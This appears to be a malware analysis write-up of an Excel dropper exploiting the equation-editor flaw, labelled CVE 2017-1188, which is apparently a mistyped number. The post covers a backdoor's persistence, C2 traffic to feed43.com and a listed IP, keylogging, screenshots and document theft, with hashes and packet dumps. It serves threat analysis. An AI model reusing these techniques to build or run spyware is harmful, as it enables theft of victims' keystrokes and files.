Excel document equipped with CVE 2017-1188
SPY / BACKDOOR, INDO-PAK CONFLICT
This vulnerability is associated with the equation data structure. Purpose of this component is to insert/modify equations in a document i.e. MSWORD, EXCEL, etc. The main issue is the handling of objects in the memory. By corrupting those objects the adversary could execute arbitrary malicious code in the address space of the vulnerable application. The vulnerable application eqnedt32.exe is a very old, out-dated application that is compiled and linked without using any security switches. It seems like the vulnerability is within MSOFFICE, however, it's being launched from the DCOM Server. This means it's outside the scope of MSOFFICE (NOT AN MSOFFICE VULNERABILITY). Eqnedt32 is an out of bound COM server.
In short, CVE 2017-1188 is a stackoverflow in the data structure, where it reaches WinExec() function.
The vulnerability is used as a dropper ONLY. EQNEDT32.EXE calls the following functions:
RtlInitUnicodeStringEx ( 0x0018e9b0, "C:\Users\foo\AppData\Roaming\MSBuild.exe" );
Where 0x0018e9b0 is the address/pointer to the buffer that will store the actual source string.
NtCreateFile is used to write the executable.
NtCreateFile ( 0x0018e9d0, FILE_READ_ATTRIBUTES | GENERIC_WRITE | SYNCHRONIZE, ObjectAttributes, IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_CREATE, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0 )
Here is some more info on the dropped file:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
LINES: 461
WORDS: 3696
CHARS: 192271
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
MD5 : 0f4f6913c3aa57b1fc5c807e0bc060fc
SHA256: 4ec1856bd5819a7edc96ec40c51acaa9d3045e2d0ea5f83459a4901371caf074
SHA1 : 00e02cba2d4f2aaabce64ed0c9c153c63bb9233e
COMPILE-TIME
Persistence:
The CVE adds the following registry value
lollipop -> C:\Users\foo\AppData\Roaming\MSBuild.exe
The second stage backdoor doesn’t start right away. It executes once the user logs off and logs in again.
MSBuild.exe uses socket calls to connect to the C2 server by using InternetOpenUrlW()
The backdoor checks for the internet access by connecting to wikipedia website.
=========================== (UDURRANI) =================================
(LAYER: 4)
s_port: 53 |d_port: 64548 |len=64548
4F 78 81 80 00 01 00 02 00 00 00 00 02 65 6E 09 Ox.?.........en.
77 69 6B 69 70 65 64 69 61 03 6F 72 67 00 00 01 wikipedia.org...
00 01 C0 0C 00 05 00 01 00 00 00 05 00 11 04 64 ...............d
79 6E 61 09 77 69 6B 69 6D 65 64 69 61 C0 19 C0 yna.wikimedia...
2E 00 01 00 01 00 00 00 05 00 04 5B C6 AE C0 ...........[...
=========================== (UDURRANI) =================================
(INIT) SYN PACKET SENT FROM 172.16.223.129 TO IP ADDRESS 91.198.174.192
PORT INFORMATION (49544, 443)
SEQUENCE INFORMATION (2254584484, 0)
|URG:0 | ACK:0 | PSH:0 | RST:0 | SYN:1 | FIN:0|
(66)
=========================== (UDURRANI) =================================
(SYN ACK ) PACKET SENT FROM 91.198.174.192 TO IP ADDRESS 172.16.223.129
PORT INFORMATION (443, 49544)
SEQUENCE INFORMATION (1061382590, 2254584485)
|URG:0 | ACK:1 | PSH:0 | RST:0 | SYN:1 | FIN:0|
(60)
00 00 ..
=========================== (UDURRANI) =================================
(ACKN) ACK PACKET SENT FROM 172.16.223.129 TO IP ADDRESS 91.198.174.192
PORT INFORMATION (49544, 443)
SEQUENCE INFORMATION (2254584485, 1061382591)
|URG:0 | ACK:1 | PSH:0 | RST:0 | SYN:0 | FIN:0|
(60)
00 00 00 00 00 00 ......
It connects to the following C2 servers to to get further instructions.
=========================== (UDURRANI) =================================
(LAYER: 4)
s_port: 53 |d_port: 61213 |len=61213
94 46 81 80 00 01 00 01 00 00 00 00 05 6E 6F 64 .F.?.........nod
65 32 06 66 65 65 64 34 33 03 63 6F 6D 00 00 01 e2.feed43.com...
00 01 C0 0C 00 01 00 01 00 00 00 05 00 04 2D 21 ..............-!
42 55 BU
=========================== (UDURRANI) =================================
(INIT) SYN PACKET SENT FROM 172.16.223.132 TO IP ADDRESS 45.33.66.85
PORT INFORMATION (49388, 80)
SEQUENCE INFORMATION (480995858, 0)
|URG:0 | ACK:0 | PSH:0 | RST:0 | SYN:1 | FIN:0|
(66)
=========================== (UDURRANI) =================================
(DATA PUSH!) IS COMING FROM 172.16.223.132 TO IP ADDRESS 45.33.66.85
PORT INFORMATION (49388, 80)
SEQUENCE INFORMATION (480995859, 2124736550)
|URG:0 | ACK:1 | PSH:1 | RST:0 | SYN:0 | FIN:0|
(376)
50 4F 53 54 20 2F 30 30 35 36 32 33 34 31 37 38 POST /0056234178
35 31 35 31 33 31 2E 78 6D 6C 20 48 54 54 50 2F 515131.xml HTTP/
31 2E 31 0D 0A 41 63 63 65 70 74 3A 20 61 70 70 1.1..Accept: app
6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 lication/x-www-f
6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A orm-urlencoded..
43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 Content-Type: ap
70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D plication/x-www-
66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D form-urlencoded.
0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 55 73 65 .User-Agent: Use
72 41 67 65 6E 74 3A 4D 6F 7A 69 6C 6C 61 2F 35 rAgent:Mozilla/5
2E 30 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E .0(Windows NT 6.
31 3B 57 4F 57 36 34 29 41 70 70 6C 65 57 65 62 1;WOW64)AppleWeb
4B 69 74 2F 35 33 37 2E 31 28 4B 48 54 4D 4C 2C Kit/537.1(KHTML,
6C 69 6B 65 20 47 65 63 6B 6F 29 43 68 72 6F 6D like Gecko)Chrom
65 2F 32 31 2E 30 2E 31 31 38 30 2E 37 35 53 61 e/21.0.1180.75Sa
66 61 72 69 2F 35 33 37 2E 31 0D 0A 48 6F 73 74 fari/537.1..Host
3A 20 6E 6F 64 65 32 2E 66 65 65 64 34 33 2E 63 : node2.feed43.c
6F 6D 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 om..Content-Leng
74 68 3A 20 30 0D 0A 43 61 63 68 65 2D 43 6F 6E th: 0..Cache-Con
74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A trol: no-cache..
0D 0A ..
73 63 72 69 70 74 69 6F 6E 3E 3C 21 5B 43 44 41 scription><![CDA
54 41 5B 5B 5B 59 7A 6C 68 59 6D 4D 31 4E 6D 4A TA[[[YzlhYmM1NmJ
6A 5A 54 68 69 4D 47 56 68 59 54 52 6B 4E 47 52 jZThiMGVhYTRkNGR
68 5A 44 68 6B 4E 47 56 6C 4E 57 4E 6D 59 7A 5A hZDhkNGVlNWNmYzZ
6A 4E 6D 4E 68 4F 47 4A 6A 4E 54 49 30 59 32 59 jNmNhOGJjNTI0Y2Y
34 4E 44 67 30 4D 6A 4D 3D 5D 5D 5D 5D 3E 3C 2F 4NDg0MjM=]]]]></
64 65 73 63 72 69 70 74 69 6F 6E 3E 0A 20 20 20 description>.
20 3C 6C 61 73 74 42 75 69 6C 64 44 61 74 65 3E <lastBuildDate>
54 75 65 2C 20 31 33 20 41 75 67 20 32 30 31 39 Tue, 13 Aug 2019
20 30 35 3A 31 37 3A 34 39 20 47 4D 54 3C 2F 6C 05:17:49 GMT</l
61 73 74 42 75 69 6C 64 44 61 74 65 3E 0A 20 20 astBuildDate>.
20 20 3C 67 65 6E 65 72 61 74 6F 72 3E 46 65 65 <generator>Fee
64 34 33 20 50 72 6F 78 79 2F 31 2E 30 20 28 77 d43 Proxy/1.0 (w
77 77 2E 66 65 65 64 34 33 2E 63 6F 6D 29 3C 2F ww.feed43.com)</
67 65 6E 65 72 61 74 6F 72 3E 0A 20 20 20 20 3C generator>. <
74 74 6C 3E 33 36 30 3C 2F 74 74 6C 3E 0A 0A 3C ttl>360</ttl>..<
69 74 65 6D 3E 0A 3C 67 75 69 64 20 69 73 50 65 item>.<guid isPe
72 6D 61 4C 69 6E 6B 3D 22 66 61 6C 73 65 22 3E rmaLink="false">
34 37 31 32 64 31 66 64 34 32 32 66 64 63 36 62 4712d1fd422fdc6b
33 36 61 35 65 32 38 66 64 61 66 39 32 37 33 32 36a5e28fdaf92732
3C 2F 67 75 69 64 3E 0A 3C 70 75 62 44 61 74 65 </guid>.<pubDate
3E 54 75 65 2C 20 31 33 20 41 75 67 20 32 30 31 >Tue, 13 Aug 201
39 20 30 35 3A 31 37 3A 34 39 20 47 4D 54 3C 2F 9 05:17:49 GMT</
70 75 62 44 61 74 65 3E 0A 3C 74 69 74 6C 65 3E pubDate>.<title>
61 73 64 66 20 41 62 6F 75 74 20 61 73 64 66 20 asdf About asdf
57 68 61 74 20 69 73 20 61 73 64 66 20 3F 20 61 What is asdf ? a
73 64 66 20 46 6F 72 75 6D 73 3C 2F 74 69 74 6C sdf Forums</titl
65 3E 0A 3C 64 65 73 63 72 69 70 74 69 6F 6E 3E e>.<description>
3C 21 5B 43 44 41 54 41 5B 3C 70 3E 3C 73 75 62 <
The backdoor starts looking for certain files. It uses FindFirstFileW(). Then it uses lstrcmpW() and look for the following extensions
- • XLSX
- • DOCX
- • PPTX
- • TXT
Data Theft
The backdoor uses GetTempPathA(260, &buffer_pointer_1), followed by
CreateFileA(&buffer_pointer_1, 0x40000000, 0x0, 0x0, 0x2, 0x80, 0x0)
Three files are dropped in %TEMP% location
- ◦ 9PT568.dat
- ◦ TPX498.dat
- ◦ edg499.dat
- ◦ TPX499.dat
TPX498 is used to capture keystrokes in real-time. Open windows and applications are also recorded
00000020: 3000 3000 3000 3400 3000 3900 0a00 0a00 0.0.0.4.0.9.....
00000030: 3200 3000 3100 3900 2f00 3000 3800 2f00 2.0.1.9./.0.8./.
00000040: 3100 3400 2000 3100 3100 3a00 3100 3500 1.4. .1.1.:.1.5.
00000050: 3a00 3400 3300 2000 2d00 2000 7b00 4300 :.4.3. .-. .{.C.
00000060: 3a00 5c00 5700 6900 6e00 6400 6f00 7700 :.\.W.i.n.d.o.w.
00000070: 7300 5c00 7300 7900 7300 7400 6500 6d00 s.\.s.y.s.t.e.m.
00000080: 3300 3200 5c00 6300 6d00 6400 2e00 6500 3.2.\.c.m.d...e.
00000090: 7800 6500 7d00 0a00 5b00 4500 4e00 5400 x.e.}...[.E.N.T.
000000a0: 4500 5200 5d00 0a00 0a00 3200 3000 3100 E.R.].....2.0.1.
000000b0: 3900 2f00 3000 3800 2f00 3100 3400 2000 9./.0.8./.1.4. .
000000c0: 3100 3100 3a00 3100 3500 3a00 3500 3700 1.1.:.1.5.:.5.7.
000000d0: 2000 2d00 2000 7b00 5300 7400 6100 7200 .-. .{.S.t.a.r.
000000e0: 7400 2000 6d00 6500 6e00 7500 7d00 0a00 t. .m.e.n.u.}...
000000f0: 6e00 6f00 7400 6500 7000 6100 6400 5b00 n.o.t.e.p.a.d.[.
00000100: 4500 4e00 5400 4500 5200 5d00 0a00 0a00 E.N.T.E.R.].....
00000110: 3200 3000 3100 3900 2f00 3000 3800 2f00 2.0.1.9./.0.8./.
00000120: 3100 3400 2000 3100 3100 3a00 3100 3500 1.4. .1.1.:.1.5.
00000130: 3a00 3500 3900 2000 2d00 2000 7b00 5500 :.5.9. .-. .{.U.
00000140: 6e00 7400 6900 7400 6c00 6500 6400 2000 n.t.i.t.l.e.d. .
00000150: 2d00 2000 4e00 6f00 7400 6500 7000 6100 -. .N.o.t.e.p.a.
00000160: 6400 7d00 0a00 5b00 5300 4800 4900 4600 d.}...[.S.H.I.F.
00000170: 5400 5d00 7000 6100 7300 7300 7700 6f00 T.].p.a.s.s.w.o.
00000180: 7200 6400 3100 3200 3300 3400 3500 3600 r.d.1.2.3.4.5.6.
00000190: 5b00 5300 4800 4900 4600 5400 5d00 3700 [.S.H.I.F.T.].7.
000001a0: 5b00 5300 4800 4900 4600 5400 5d00 3600 [.S.H.I.F.T.].6.
000001b0: 5b00 5300 4800 4900 4600 5400 5d00 3500 [.S.H.I.F.T.].5.
000001c0: 5b00 5300 4800 4900 4600 5400 5d00 3400 [.S.H.I.F.T.].4.
000001d0: 5b00 5300 4800 4900 4600 5400 5d00 3300 [.S.H.I.F.T.].3.
000001e0: 5b00 5300 4800 4900 4600 5400 5d00 3200 [.S.H.I.F.T.].2.
000001f0: 5b00 4500 4e00 5400 4500 5200 5d00 0a00 [.E.N.T.E.R.]...
00000200: 0a00 3200 3000 3100 3900 2f00 3000 3800 ..2.0.1.9./.0.8.
00000210: 2f00 3100 3400 2000 3100 3100 3a00 3100 /.1.4. .1.1.:.1.
00000220: 3600 3a00 3000 3700 2000 2d00 2000 7b00 6.:.0.7. .-. .{.
00000230: 4300 3a00 5c00 5700 6900 6e00 6400 6f00 C.:.\.W.i.n.d.o.
00000240: 7700 7300 5c00 7300 7900 7300 7400 6500 w.s.\.s.y.s.t.e.
00000250: 6d00 3300 3200 5c00 6300 6d00 6400 2e00 m.3.2.\.c.m.d...
9PT568 is used to get the computer hardware profile ID.
TPX499 is used to capture screen shots
edg499 is used to save path to .TXT, .PPT, .PDF, XLS, DOC, DOCX files.
Let’s examine how the keystrokes are captured in real-time.
The backdoor can receive instructions form the C2. E.g. if it receives the value 0x4, it will read edg499 and delete it.
If it receives 0x21, it will use shell execute to spawn a specific file | command.
This would simply mean: Download (InternetOpenW -> InternetOpenUrlW -> InternetReadFile), open file handle, write, close handles and execute.
Conclusion:
This backdoor is used to steal important documents, keystrokes, screenshots, etc. It may be linked to an Indian APT group. The backdoor is using popular or social media websites for C2 mechanism. Such websites are not flagged by most of the popular firewalls and IPS engines. Let’s get to the VT report for the 1st stage dropper.
STAY AWAY FROM BACKDOORS
